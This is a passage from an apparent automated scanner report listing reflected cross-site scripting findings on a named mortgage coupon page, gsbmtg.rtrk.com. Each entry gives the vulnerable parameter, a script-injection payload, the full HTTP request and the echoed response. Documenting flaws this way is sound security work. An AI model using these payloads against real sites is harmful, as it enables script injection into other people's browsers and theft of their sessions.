Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:29 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829cfc43'><script>alert(1)</script>24de61d88b7&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.140. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [dynamic_proxy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c2239'><script>alert(1)</script>f71a112c65e was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1c2239'><script>alert(1)</script>f71a112c65e&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:56 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1c2239'><script>alert(1)</script>f71a112c65e&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.141. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [dynamic_proxy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the dynamic_proxy request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367c8"><script>alert(1)</script>5ab130b97d9 was submitted in the dynamic_proxy parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:55 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:47 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1367c8"><script>alert(1)</script>5ab130b97d9&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.142. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d8aff'><script>alert(1)</script>47f8bcfe9d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?d8aff'><script>alert(1)</script>47f8bcfe9d3=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:36 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:28 GMT;path=/;httponly
Content-Length: 6199


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&d8aff'><script>alert(1)</script>47f8bcfe9d3=1&rl_track_landing_pages=1' />
...[SNIP]...

1.143. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96167"><script>alert(1)</script>32c7c592d7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:35 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:27 GMT;path=/;httponly
Content-Length: 6199


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?96167"><script>alert(1)</script>32c7c592d7e=1&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.144. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [primary_serv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76da2"><script>alert(1)</script>5dae8506858 was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:02 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:53 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com76da2"><script>alert(1)</script>5dae8506858&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.145. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [primary_serv parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the primary_serv request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6389e'><script>alert(1)</script>e62412c1fab was submitted in the primary_serv parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com6389e'><script>alert(1)</script>e62412c1fab&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:03 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7f45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:54 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com6389e'><script>alert(1)</script>e62412c1fab&rl_track_landing_pages=1' />
...[SNIP]...

1.146. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14188'><script>alert(1)</script>e40d41c94b6 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb014188'><script>alert(1)</script>e40d41c94b6&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:50 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:42 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb014188'><script>alert(1)</script>e40d41c94b6&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.147. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a30c4"><script>alert(1)</script>c7a08c9e329 was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:49 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:41 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0a30c4"><script>alert(1)</script>c7a08c9e329&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.148. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_track_landing_pages parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 365b2"><script>alert(1)</script>3bd7c0702c5 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:07 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:59 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
ntactForm('/coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1365b2"><script>alert(1)</script>3bd7c0702c5');" id="send_btn">
...[SNIP]...

1.149. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_track_landing_pages parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 31691'><script>alert(1)</script>19c3a704535 was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=131691'><script>alert(1)</script>19c3a704535 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:08 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7a45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:45:00 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=131691'><script>alert(1)</script>19c3a704535' />
...[SNIP]...

1.150. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [scid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d36d"><script>alert(1)</script>507bab1fa3b was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:24 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7645525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<a href="javascript:submitContactForm('/coupon/d544/544003/index4.html?scid=17949714d36d"><script>alert(1)</script>507bab1fa3b&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1');" id="send_btn">
...[SNIP]...

1.151. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [scid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 64696'><script>alert(1)</script>dca245ab55 was submitted in the scid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=179497164696'><script>alert(1)</script>dca245ab55&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:25 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:16 GMT;path=/;httponly
Content-Length: 6459


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=179497164696'><script>alert(1)</script>dca245ab55&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.152. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [tc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3a414'><script>alert(1)</script>e5878460b3e was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=110203080025953193a414'><script>alert(1)</script>e5878460b3e&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:44 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Connection: close
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7c45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:44:36 GMT;path=/;httponly
Content-Length: 6461


<!DOCTYPE HTL PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>


<title>GSB Mortgage, Inc. (Grapevine
...[SNIP]...
<input type=hidden name="_args_" value='&scid=1794971&cid=696829&tc=110203080025953193a414'><script>alert(1)</script>e5878460b3e&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1' />
...[SNIP]...

1.153. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [tc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://gsbmtg.rtrk.com
Path:   /coupon/d544/544003/index4.html

Issue detail

The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba9e7"><script>alert(1)</script>71945edcd2 was submitted in the tc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coupon/d544/544003/index4.html?scid=1794971&cid=696829&tc=11020308002595319ba9e7"><script>alert(1)</script>71945edcd2&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660; RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; RlocalHilite=kw_hilite_off%3D0;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:15:44 GMT
